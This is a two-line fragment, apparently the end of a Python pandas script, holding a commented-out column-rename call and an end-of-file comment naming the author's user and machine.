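# df = df.rename(columns=DICT_RENAME)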
# [end of file; author: jelmyhermosilla@MacBook-Pro-de-jelmy.local]